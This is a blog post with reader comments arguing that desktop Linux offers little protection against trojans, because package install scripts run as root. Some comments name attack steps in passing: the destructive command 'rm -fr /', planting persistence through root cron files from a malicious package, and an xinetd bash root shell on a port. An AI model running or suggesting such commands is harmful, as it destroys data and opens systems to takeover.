On Linux security

Well, I was about to go to bed, but I can’t sleep till I get this written.

This was prompted by yet another comment thread in which people seem to believe Linux has some kind of special sauce that keeps them super-safe from malware.

The problem is, no, no it doesn’t. In practical respects, from the point of view of the individual end-user, a typical modern Linux system is only marginally more ‘safe’ from malware ‘attacks’ than a typical modern Windows system.

There’s some things many people misunderstand, that it’s important to understand. One: most ‘malware’ on Windows, these days, is pretty simple. The majority of it falls into the category known as a trojan, or trojan horse. What this means it is doesn’t use some sort of clever exploitation of a security vulnerability in the operating system in order to propagate itself without human intervention. No, it’s much more dull. Most malware just works by getting the victims to infect themselves. Why bother going to all that trouble to exploit a security vulnerability that’ll probably be patched in a month when you can just write your nasty pop-up ad spawning application, say it’s a porn video or a poker game or a bleeding fart noise generator, and slap a few Google ads on some dodgy porn sites? This is how most modern adware works. It gets run because naive users run it, not by exploiting intrinsic vulnerabilities in the operating system.

Two, most of the much-vaunted Linux / Unix ‘security measures’ have very little relevance to your average desktop Linux user. The whole Linux security model is designed on the basis of a multi-user system. The intent is essentially that every user be allowed to do exactly what the hell s/he wants in his own environment – and only in his/her own environment. And this is done, in general, very well (though there’s usually at least a few unpatched privilege escalation vulnerabilities in the wild – still, never mind). But you have to realize the implications of this.

If you’re in a proper multi-user environment – a single system (however the hardware is set up) with dozens of unprivileged user accounts, and a system administrator – it’s a godsend. For the administrator, and all the smart users. But it does nothing for the dumb users. Why? Well, think about it. The point is that nasty code can only screw up an individual user’s own stuff – basically, his/her home directory. So no other users are affected, and the system administrator can easily deal with the situation. This is what most Linux / Unix security is about.

So, think through the implications. If you’re Joe Dumb User and you just ran a trojan, none of this helps you a jot. Why? Because all the stuff you care about lives…in your user environment. Sure, it’s great to know that Jane Smart User and the BOFH can still truck along hunky dory, but there’s nothing at all to stop the trojan you just ran from popping up several zillion ads on your desktop. Or opening a browser to a selection of the finest in erotic entertainment sites, just as your boss walks in. Or wiping out all your precious files. Because they’re all stored in your flipping home directory, where any process running with your user privileges can do whatever the hell it likes.

Think a little further. If you run Linux on your desktop, you probably don’t run a true multi-user environment. Again, the whole concept of multi-user security does stuff all for you. If you run a trojan, it can annoy you as much as it likes, and kill all the data you care about. Yes, multi-user security prevents it doing anything to any system-wide files. But, so what? There’s very little you actually care about stored in /usr or /etc, is there? All your contacts, presentations and the fifth draft of your Next Great American Novel all live in /home/yourusername, where the trojan can do whatever the heck it likes to them.

Three, and this is the big one, 99% of desktop Linux users run completely arbitrary code as root, on at least a semi-regular basis.

Yes, really, they (you) do. Why? Well, think about what happens when you install a package. The installation process runs as root. And it runs utterly arbitrary code. When you install an RPM package, something called the post script is run with root privileges. That script can be, well, anything at all. There’s something equivalent for DEB packages, and ebuilds, and every other form of package management. It’s not possible to build a package management system without this.

And, shout out if you only ever install properly signed packages from your distribution’s official repositories.

…quiet room, huh?

Just about everyone has installed a package for Some Kewl Application from some random third party website somewhere. Heck, this is a third-party website and I throw up packages for people all the time. When you go to www.mycoollinuxsite.com and install a package for a wireless card driver or a poker game or whatever the crap it is – congratulations, you just ran completely arbitrary code as root. You just did exactly the same thing any Windows-using clown who installs some poker game from www.mycoolwindowssite.com did. You don’t have a single iota more “protection” or “security” than the Windows-using clown. If whoever made that package – and you don’t have a clue who it was – wanted to own your system, they just did. Good job, sport.

I’m not saying this to be negative about the importance of security or how well security is managed on Linux. Security is vital, and Linux distributions generally achieve their security goals rather well. The point is a general one. As long as an operating system lets the user run arbitrary code, it’s always going to be possible for a trojan to do whatever it likes to all the data that user cares about. As long as an operating system wants to make it relatively easy to install applications, it’s always going to be possible for a trojan to do whatever the hell it likes to any system, if someone chooses to install it. There is no security measure against that. The only operating system that can be ‘secure’ against this type of attack is one which is very locked down, and does not allow you to install or run arbitrary code. Like a restricted cellphone operating system. That’s fine, but it’s not what people want on their computers.

It’s really important that everyone who owns a computer understands this. Your computer is not magic. It cannot protect you from malicious code if you choose to run that code, no matter whether your operating system is Windows, Linux, OS X, FreeBSD or bloody BeOS. Dan says that data you keep in just one place is obviously data you don’t care about. I’d add that data you keep on a system on which you run arbitrary code, and nowhere else, is also obviously data you don’t care about.

Most people are not willing to accept the inconvenience that comes with only ever installing code that’s either a) 100% provably provided by a person or company you trust implicitly, or b) that you’ve examined every line of yourself. And that’s fine. But if you’re in this majority, you have to accept that the danger of trojan-type malware is one that can never be designed out by an operating system, and don’t be lulled into a false sense of security by the ‘Linux is invincible’ crowd. Yes, Linux is a properly multi-user operating system and secure from that perspective, in most implementations. Yes, Linux is generally quite well-secured against true ‘viruses’ – malicious code that is run without explicit user intervention. No, it is not magically safe against malicious code unwittingly run by the operator. It can never be.

The bottom line – I could publish a package along with this post which, after you double-clicked on it, entered your root password, and said “yes” to “the package is not signed, install it anyway?”, would zero out your hard disk. I could, by writing this post differently, probably convince quite a lot of people to install said package. Just because it (to my knowledge) hasn’t happened yet, doesn’t mean it can’t. Be careful what you run.

14 Responses

  1. misc
    misc January 20, 2009 at 2:15 am | | Reply

    I don’t agree, it already happened :)
    I know some guy in some 3 letters organisation with a penguin with gun that said to a user to install a xinetd config file that was running bash as root on port 5000 :)

  2. vfmmeo
    vfmmeo January 20, 2009 at 5:09 am | | Reply

    Yes!

    Lately we have a little discursion about security in Blogdrake. And my opinion es absolutely equal to yours: The key component of any kind of security infrastructure in a desktop system is located between the keyboard and the chair.

    There’s no more or less secure Operating Systems (in general terms), there’s more or less cautious and smart computer users.

    It’s exactly the same a double-click on “halleberrynudexxxscreensaver.exe” or “halleberrynudexxxscreensaver.rpm” (or “.deb”) next -> next -> next… “Hey! Where’s Halle?”

  3. glyj
    glyj January 20, 2009 at 6:11 am | | Reply

    In fact, from that point of view, windows is more secure than Linux, if there are some programs like norton that are installed. Antivirus and firewalls are quite old on windows platforms :-D : they had time to improve the tools.
    I read an article about this in an excellent magazine called MISC (it’s a french one) they performed several tests on several platforms and presented the methods to detect suspicious behaviours on the system… ( with plenty of maths & algorithmic ….)

    the introduction was something like : “we achieve to broke ALL the systems we tested (including openBSD, Linux …) ” and ” but some were harder to break …”

    One of the best ones was Windows with antivirus & firewall…

    regards,
    glyj

  4. glyj
    glyj January 20, 2009 at 8:58 am | | Reply

    I forgot a link to MISC : http://www.miscmag.com/

  5. Dark_Schneider971
    Dark_Schneider971 January 20, 2009 at 9:56 am | | Reply

    You’re are 100% right Adam.

    In fact the strength of Linux is the fact that … it’s not easy to install third-party applications ! Indeed to install third-party applications you have to deal with several issues : package format ( TGZ vs RPM vs DEB ), API/libraries versions issues, compatibility issue, need to know root password eventually.

    So one of the main weakness of Linux to be able to be easy to use for mass consumer market is fact also what allow Linux to be less targeted by malware. When everybody will be running ubuntu with full sudo power for first user, then we will have the same issues than Windows users ;-)

    SELinux/AppArmor may help, but most of the time only for known applications as you can provide rules saying that application X is allowed to this, but not allowed to do that. But for a third-party application ? as you don’t know, you will let the application do whatever he wants, and then he can just open a port on a unprivileged port and listen or send informations …

    The only way to be protected against theses kinds of issues are :
    - monitor changes to critic system configuration files or binaries ( chkrootkits for example )

    - prevent unknown or unwanted applications from communicating to outside world with a Firewall ( however at one point users will just answer yes to everything ).

    - monitor system activity for abnormal ones … in short running an AntiVirus/AntiTrojan/AntiMalware …

    - or easier : only install packages from trusted sources. However, is Mandriva checking all the code in all of its packages ? I don’t think so. It’s easy to become the packager for a distribution, doing a good job at the beginning, and when you are ready, ad some subtle change that will allow you to install a rootkit or trojan in the users computers. And you don’t even need to do a “rm -fr /” right after the package installation. Just edit root crontab or put a file in /etc/cron.monthly or cron.yearly.

  6. boklm
    boklm January 20, 2009 at 10:53 am | | Reply

    I agree with what you said, but I think there is still a reason why it’s much more easy to create a virus on Windows :
    - On Windows the usual way to install a software is to use google and download it from a randow web site. And some of those web sites are created by people who happen to have a virus on their computer.
    - On Linux you use the package manager.
    - On Windows because you have to download programs yourself, people often keep executable files in some folders on their hard drive, a few months later they burn them on a CD, and use them on an other computer or give it to their friends. A virus infecting all executables on a computer can easily move to an other computer this way.
    - On Linux everything is available in the packages repository. Keeping a collection of packages on your hard drive is not very useful so most people don’t do it.

  7. vfmmeo
    vfmmeo January 21, 2009 at 12:19 am | | Reply

    @boklm

    “- On Linux you use the package manager.”

    Not ever is true. That’s the matter. If your distro has not packaged the soft, if the propietary driver isn’t available, if you’re new on Linux and all you know to do is the windows way…

    And, what’s the difference (again) between “halleberrynude.rpm” (or .deb) and “halleberrynude.exe”. You only need a double-click and a root password?

  8. boklm
    boklm January 21, 2009 at 1:56 am | | Reply

    @vfmmeo: yes you can also install software manually on Linux, but that’s not what you do most of the time. On Windows that’s what you have to do most of the time because there is no other way. That’s the difference.

  9. Dark_Schneider971
    Dark_Schneider971 January 21, 2009 at 2:44 am | | Reply

    boklm> Sure, but it’s also because on Linux we are not used to install third-party software. But when you may have a mass market for Linux, you will have more third-parties softwares ( i.e proprietary softwares ) that people will have to install themselves manually as some may not be packages by the distro. Thinks of some games, Photoshop, iTunes, etc …. Ok, we have nearly equivalent, but at the end, it’s the user who takes the decision.

  10. Dark_Schneider971
    Dark_Schneider971 January 21, 2009 at 2:45 am | | Reply

    adamw> I wrote a more complete follow-up on my blog : http://linux-wizard.net/blog-follow_up__on_linux_security-250.html

  11. vfmmeo
    vfmmeo January 21, 2009 at 5:13 am | | Reply

    @Dark:

    That’s the key!

  12. Boycott Novell » IRC: #boycottnovell @ FreeNode: January 21st, 2009 - Part 1

    [...] AdamW is still insisting that Linux is not secure (et tu, Adam?): http://www.happyassassin.net/2009/0… [...]

  13. tech78
    tech78 February 2, 2009 at 12:42 pm | | Reply

    As a support tech who’s cleaned up more than his share of virus & malware infected Windows machines, I’ve seen nothing comparable to the “drive-by” vulnerabilities posed by ActiveX scripting. I know Java and Javascript come close, but still nothing like the gaping hole provided by the Internet Explorer/ActiveX combo from what I see in the field.

You can comment without reCAPTCHA by using an OpenID as the URL, or logging in with an OpenID or an old site account.

Leave a Reply